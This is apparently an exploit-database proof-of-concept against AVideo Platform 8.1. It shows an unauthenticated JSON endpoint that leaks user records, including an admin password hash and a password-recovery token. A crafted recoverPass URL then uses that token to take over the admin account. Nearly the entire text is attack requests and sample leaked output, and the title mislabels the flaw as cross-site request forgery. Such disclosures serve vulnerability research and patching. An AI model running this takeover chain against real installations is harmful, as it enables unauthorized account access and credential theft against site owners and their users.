33 lines
No EOL
865 B
Text
33 lines
No EOL
865 B
Text
# Exploit Title: AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)
|
|
# Dork: N/A
|
|
# Date: 2020-02-05
|
|
# Exploit Author: Ihsan Sencan
|
|
# Vendor Homepage: https://avideo.com
|
|
# Software Link: https://github.com/WWBN/AVideo
|
|
# Version: 8.1
|
|
# Tested on: Linux
|
|
# CVE: N/A
|
|
|
|
# POC:
|
|
# 1)
|
|
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
|
|
#
|
|
................
|
|
0
|
|
id 92
|
|
user "admin"
|
|
name "Watch Later"
|
|
email "user@localhost"
|
|
password "bc79a173cc20f0897db1c5b004588db9"
|
|
created "2019-05-16 21:42:42"
|
|
modified "2019-05-16 21:42:42"
|
|
isAdmin 1
|
|
status "watch_later"
|
|
photoURL "videos/userPhoto/photo1.png"
|
|
lastLogin "2020-02-03 08:11:08"
|
|
recoverPass "0ce70c7b006c78552fee993adeaafadf"
|
|
................
|
|
#
|
|
# Password recovery can be done using recoverPass.
|
|
# http://localhost/[PATH]/recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf
|
|
# |